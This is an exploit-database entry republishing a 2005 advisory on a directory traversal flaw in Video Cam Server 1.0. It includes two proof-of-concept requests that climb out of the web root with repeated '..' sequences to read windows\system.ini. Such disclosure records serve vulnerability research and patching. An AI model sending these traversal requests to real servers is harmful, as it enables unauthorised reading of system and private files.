video cam server 1.0 - Directory Traversal

EDB-ID:

25571

CVE:

N/A


Platform:

Windows

Published:

2005-05-02

source: http://www.securityfocus.com/bid/13456/info

Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
GET /../../../../../../../../../../../windows/system.ini HTTP/1.1